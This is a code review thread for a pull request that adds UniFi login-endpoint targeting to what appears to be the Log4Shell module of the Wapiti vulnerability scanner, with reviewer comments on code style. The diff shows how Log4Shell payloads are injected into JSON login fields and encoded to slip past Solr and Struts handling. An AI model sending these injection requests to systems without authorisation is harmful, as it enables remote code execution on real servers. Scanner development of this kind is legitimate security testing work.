### PR TITLE
Adding UniFi into log4shell module

### PR DESCRIPTION
**Pull request by Darkiros**
Add UniFi payload in log4shell module.

### CODE REVIEW

File: wapitiCore/attack/mod_log4shell.py [hunk 1]
```diff
@@ -64,9 +66,43 @@ async def _attack_vsphere_url(self, original_request: Request):
...
+
+        payload_unique_id = uuid.uuid4()
+        payload = self._generate_payload(payload_unique_id)
+
+        malicious_request_username = Request(
+            path=request_url,
+            method="POST",
+            enctype="application/json",
+            post_params="{\"username\": \""+payload+"\", \"password\": "
+            "\"Letm3in_\", \"remember\": false, \"strict\": true}"
```
Comment (Slokilla) [inline wapitiCore/attack/mod_log4shell.py:79]: There's a lot of backslashes, turning it hard to read. Let's try to use Python 3's f-strings :

`post_params=f'{"username": "{payload}", "password": "Letm3in_", "remember": false, "strict": true}'`

File: wapitiCore/attack/mod_log4shell.py [hunk 2]
```diff
@@ -64,9 +66,43 @@ async def _attack_vsphere_url(self, original_request: Request):
...
+        )
+
+        malicious_request_remember = Request(
+            path=request_url,
+            method="POST",
+            enctype="application/json",
+            post_params="{\"username\": \"alice\", \"password\": "
+            "\"Letm3in_\", \"remember\": \""+payload+"\", \"strict\": true}"
```
Comment (Slokilla) [inline wapitiCore/attack/mod_log4shell.py:87]: same as above :

`post_params=f'{"username": "alice", "password": "Letm3in_", "remember": "{payload}", "strict": true}'`

File: wapitiCore/attack/mod_log4shell.py [hunk 3]
```diff
@@ -64,9 +66,43 @@ async def _attack_vsphere_url(self, original_request: Request):
...
+            response = await self.crawler.async_send(malicious_request_remember, follow_redirects=True)
+            await self._verify_param_vulnerability(malicious_request_remember, payload_unique_id, "remember", response)
+        except RequestError:
+            self.network_errors += 1
+
     async def attack_apache_solr_url(self, request_url: str):
         payload_unique_id = uuid.uuid4()
-        payload = self._generate_payload(payload_unique_id).replace("{", "%7B").replace("}", "%7D")
+        payload = self._generate_payload(payload_unique_id).replace(
+            "{", "%7B").replace("}", "%7D")
```
Comment (Slokilla) [inline wapitiCore/attack/mod_log4shell.py:105]: it's ugly to start a new line like this :( 

```
payload = self._generate_payload(payload_unique_id)
                       .replace("{", "%7B")
                       .replace("}", "%7D")
```

File: wapitiCore/attack/mod_log4shell.py [hunk 4]
```diff
@@ -87,9 +123,11 @@ async def _attack_apache_struts(self, request_url: str):
 
         # Here we need to replace "//" by "$%7B::-/%7D/" because Apache Struts will replace "//" by "/"
         # and with these special characters it will keep "//"
-        payload = self._generate_payload(payload_unique_id).replace("//", "$%7B::-/%7D/")
+        payload = self._generate_payload(
+            payload_unique_id).replace("//", "$%7B::-/%7D/")
```
Comment (Slokilla) [inline wapitiCore/attack/mod_log4shell.py:127]: ugly too :-(

**Review by Slokilla — CHANGES_REQUESTED** [review]

File: wapitiCore/attack/mod_log4shell.py (hunk 1 above)
Comment (Darkiros) [reply wapitiCore/attack/mod_log4shell.py]: Thanks 👍

File: wapitiCore/attack/mod_log4shell.py (hunk 3 above)
Comment (Darkiros) [reply wapitiCore/attack/mod_log4shell.py]: Thanks to bad pylint config...

File: wapitiCore/attack/mod_log4shell.py [hunk 5]
```diff
@@ -28,9 +28,10 @@ class ModuleLog4Shell(Attack):
     VSPHERE_URL = "websso/SAML2/SSO"
     DRUID_URL = "druid/coordinator/v1/lookups/config/"
     SOLR_URL = "solr/admin/cores"
+    UNIFI_URL = "api/login"
 
     def __init__(self, crawler, persister, attack_options, stop_event, crawler_configuration):
-        Attack.__init__(self, crawler, persister, attack_options, stop_event, crawler_configuration)
+        Attack.__init__(self, crawler, persister, attack_options,stop_event, crawler_configuration)
```
Comment (bretfourbe) [inline wapitiCore/attack/mod_log4shell.py:34]: space missing here ;)

**Review by bretfourbe — APPROVED** [review]

**Review by fwininger — APPROVED** [review]

**Pull request merged**